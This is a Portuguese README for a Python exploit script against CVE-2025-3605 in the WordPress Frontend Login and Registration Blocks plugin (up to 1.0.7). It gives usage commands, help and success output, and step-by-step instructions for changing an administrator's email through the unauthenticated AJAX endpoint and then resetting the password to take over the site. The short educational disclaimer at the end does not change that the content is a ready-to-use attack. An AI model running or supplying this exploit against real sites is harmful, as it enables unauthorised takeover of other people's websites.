
WordPress Frontend Login and Registration Blocks Plugin <= 1.0.7 é vulnerável à escalação de privilégios.
O plugin Frontend Login and Registration Blocks para WordPress (versões <= 1.0.7) é vulnerável a escalada de privilégios via tomada de conta.
O problema ocorre porque o plugin não valida a identidade do usuário ao atualizar detalhes sensíveis como e-mail através da função flr_blocks_user_settings_handle_ajax_callback().
✅ Impacto:
Um atacante não autenticado pode alterar o e-mail do administrador, acionar o processo de "Esqueci a Senha" e redefinir a senha do administrador, obtendo controle total.
O script Python incluído automatiza o processo de exploração visando o endpoint AJAX vulnerável:
/wp-admin/admin-ajax.php
Ele atualiza o e-mail do usuário alvo (normalmente user_id 1 para admin) para um e-mail controlado pelo atacante.
Nome do arquivo: CVE-2025-3605.py
python CVE-2025-3605.py --url http://target-site/wordpress --user_id 1 --mail [email protected]
✅ Valores padrão:
--user_id: 1 (admin padrão)--mail: [email protected]Para ver o menu de ajuda, execute:
python CVE-2025-3605.py --help
Saída:
[+] Starting exploit script...
usage: a.py [-h] --url URL [--user_id USER_ID] [--mail MAIL]
Frontend Login and Registration Blocks Plugin <= 1.0.7 is vulnerable to Privilege Escalation # By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
--url, -u URL Target URL, e.g., http://192.168.100.74:888/wordpress
--user_id, -id USER_ID
User ID to target (default: 1)
--mail, -mail MAIL Email to set (default: [email protected])
✅ Exemplo de execução:
python CVE-2025-3605.py -u http://192.168.100.74:888/wordpress -id 1 -mail [email protected]
✅ Em caso de sucesso:
[+] Starting exploit script...
[+] Sending exploit to http:/target.com/wp-admin/admin-ajax.php/wp-admin/admin-ajax.php
[+] Exploit successful! Response: {"status":true,"message":"Operation has been completed successfully."}
[+] Final Step: Go to the Forgot Password page and reset the admin password using the new email!
Exploit By : Khaled_alenazi ( Nxploited )
❌ Em caso de falha:
[!] Exploit failed. HTTP Status: 400
[!] Response: 0
1️⃣ Navegue até:
http://target-site/wordpress/wp-login.php
2️⃣ Insira o novo e-mail que você definiu ([email protected]).
3️⃣ Solicite a redefinição de senha.
4️⃣ Defina uma nova senha.
5️⃣ Faça login como administrador e aproveite o acesso total.
Este exploit e script são fornecidos apenas para fins educacionais e de testes autorizados.
Qualquer uso não autorizado contra sistemas que você não possui ou sem permissão explícita para testar é ilegal e antiético.
Por: Khaled Alenazi (Nxploited)